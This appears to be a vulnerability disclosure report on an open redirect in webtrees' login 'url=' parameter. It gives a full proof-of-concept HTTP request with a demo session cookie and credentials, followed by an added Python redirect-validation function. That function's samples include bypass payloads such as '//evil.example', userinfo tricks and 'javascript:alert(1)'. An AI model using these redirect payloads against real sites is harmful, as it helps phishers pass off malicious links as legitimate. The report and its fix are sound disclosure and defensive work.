Open Redirect in fisharebest/webtrees
Valid
Reported on
Sep 28th 2021
Description
Open redirect at login via the url= parameter.
Proof of Concept
// PoC.request
POST /demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=ekks8678620p55do7do21jd4p1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
_csrf=o57ZmYPF0fQhPhLNSs3ICWiKzwnj9wFt&url=https%3A%2F%2Fgoogle.com&username=editor&password=editor
Steps to Reproduce
Access the login page with the URL: https://dev.webtrees.net/demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo&url=https://google.com
After a successful login, the application redirects to google.com.
Impact
The post-login redirect is not restricted to relative URLs within the application, so an attacker could use it to make an end user believe that a malicious URL they were redirected to after logging in is legitimate.
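The root cause described above is that the login handler forwards to whatever the url parameter contains. The mitigation is to treat that parameter as untrusted and only honour targets that stay on the application's own origin. The following is an added example of such a check, not code from webtrees; the host name app.example.org, the fallback landing path and the sample inputs are constructed for illustration. It goes slightly beyond the report's single case by also rejecting the usual bypass shapes (protocol-relative //host, backslash variants, non-http schemes, userinfo tricks, and a same-host URL whose path itself starts with //).

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed for this example: the application's own host, against which
# every post-login redirect target is checked (hypothetical, not from the report).
APP_HOST = "app.example.org"
DEFAULT_LANDING = "/"


def safe_redirect_target(url: str, app_host: str = APP_HOST,
                         fallback: str = DEFAULT_LANDING) -> str:
    """Return a redirect target derived from `url` only if it stays on this
    application; otherwise return `fallback`.

    Accepted: an absolute path on this site such as "/tree/demo?x=1", or an
    http(s) URL whose host exactly matches `app_host` (reduced to its path).
    Rejected: other hosts, protocol-relative "//host", backslash variants,
    non-http(s) schemes, userinfo tricks ("https://good@evil"), and paths
    that would themselves be read as protocol-relative.
    """
    if not url:
        return fallback

    # Browsers treat "\" as "/" in http(s) URLs, so "/\evil" becomes "//evil".
    # Normalise before parsing so the netloc check below sees it.
    candidate = url.replace("\\", "/")
    # Drop control characters and surrounding whitespace that confuse parsers.
    candidate = "".join(ch for ch in candidate if ch.isprintable()).strip()

    parts = urlsplit(candidate)

    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: must be an absolute path on this site. "///host"
        # parses with an empty netloc but still starts with "//", so reject it.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return urlunsplit(("", "", parts.path, parts.query, parts.fragment)) or fallback
        return fallback

    # Absolute URL: only http(s) to exactly our own host is acceptable.
    if parts.scheme.lower() not in ("http", "https"):
        return fallback
    if not parts.hostname or parts.hostname.lower() != app_host.lower():
        return fallback

    # Same host: keep only path/query/fragment so the result is always relative.
    path = parts.path or "/"
    if path.startswith("//"):
        # urlunsplit with empty scheme/netloc would emit "//evil", which a
        # browser reads as protocol-relative. Refuse rather than rewrite.
        return fallback
    return urlunsplit(("", "", path, parts.query, parts.fragment))


def demo() -> dict:
    """Run the check over constructed sample inputs (including the value from
    the report) and return the decisions, for a quick visual sanity check."""
    samples = [
        "https://google.com",                    # the report's PoC value
        "/tree/demo?x=1",                        # legitimate in-app target
        "//evil.example",                        # protocol-relative
        "/\\evil.example",                       # backslash variant
        "https://app.example.org/tree/demo",     # same host, absolute
        "https://app.example.org@evil.example/", # userinfo trick
        "https://app.example.org//evil.example", # same host, "//" path
        "javascript:alert(1)",                   # non-http scheme
    ]
    return {s: safe_redirect_target(s) for s in samples}


if __name__ == "__main__":
    for target, decision in demo().items():
        print(f"{target!r:45} -> {decision!r}")
```

The check deliberately returns a relative path even for same-host absolute URLs, so the final Location header never carries a host chosen by the request. The fallback is a fixed landing page rather than an error, which keeps the login flow working for users who arrive with a stale or tampered url value.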
We have contacted a member of the fisharebest/webtrees team and are waiting to hear back.